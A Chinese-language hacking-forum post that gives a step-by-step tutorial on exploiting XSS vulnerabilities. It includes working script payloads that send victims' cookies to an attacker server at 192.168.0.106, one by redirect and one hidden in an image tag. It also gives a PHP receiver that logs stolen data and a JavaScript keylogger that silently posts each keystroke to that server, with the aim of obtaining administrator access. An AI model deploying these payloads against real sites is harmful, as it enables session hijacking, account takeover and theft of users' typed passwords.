[漏洞利用] xss漏洞之——漏洞利用

549 0
Honkers 2026-2-2 22:27:03 来自手机 | 显示全部楼层 |阅读模式

1.获取cookie进行无密码登陆

原理
网页被植入网页被植入xss脚本,普通用户访问此网页时,会自动将用户本地的cookie缓存发送到指定远端服务器
利用
(1)首先登陆一个页面,抓包获取cookie


(2)复制此页面里任一选项的url,重启浏览器后直接访问此url,抓包修改cookie为上面获取的登陆成功后的cookie

(3)页面登陆成功,无需密码

2.利用XSS漏洞获取管理员权限(获取cookie)

(1)在我们自己的远程服务器创建一个接收cookie的文件1.php,1.php接受cookie后,将cookie写入到1.txt保存
代码

(2)构造url,使打开此url的用户发送本地cookie给远程服务器
(2.1)直接将代码拼接到url,将cookie值改为获取本地cookie,并执行
代码:

  1. <script>document.location='http://192.168.0.106/xss/1.php?cookie='+document.cookie;</script>
复制代码

效果:
打开此url的用户跳转到如下界面,并将本地cookie发送到远程服务器,写入远程服务器的1.txt中
(2.2)直接拼接url访问时会跳转页面,可将代码写入一个图片标签里在再拼接到url
代码

  1. <script>document.body.innerHTML+="<img src='http://192.168.0.106/xss/1.php?cookie="+document.cookie+"'>";</script>
复制代码

3.XSS键盘记录

(1)在我们自己的远程服务器创建一个接收用户按键记录的文件keylog.php,keylog.php接收键盘记录后,将键盘记录写入到keylog.txt保存
代码:

  1. <?php
  2. header("Access-Control-Allow-Credentials: true");
  3. header("Access-Control-Allow-Origin: 192.168.0.106");
  4. header("Access-Control-Request-Methods:GET, POST, PUT, DELETE, OPTIONS");
  5. header('Access-Control-Allow-Headers:x-requested-with,content-type,test-token,test-sessid');
  6. $file=fopen("keylog.txt","a");
  7. $_REQUEST['keylog'];
  8. $key=$_REQUEST['keylog'];
  9. fputs($file,$key);
  10. ?>
复制代码

(2)构造url,使打开此url的用户发送所有的键盘记录给我们的远程服务器(通过ajax,隐蔽)
代码:

  1. <script>document.onkeydown=function (ev) {var xhr=new XMLHttpRequest();xhr.open('POST','http://192.168.0.106/xss/keylog/keylog.php',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('keylog='+String.fromCharCode(ev.keyCode));}</script>
复制代码

效果:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2026 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行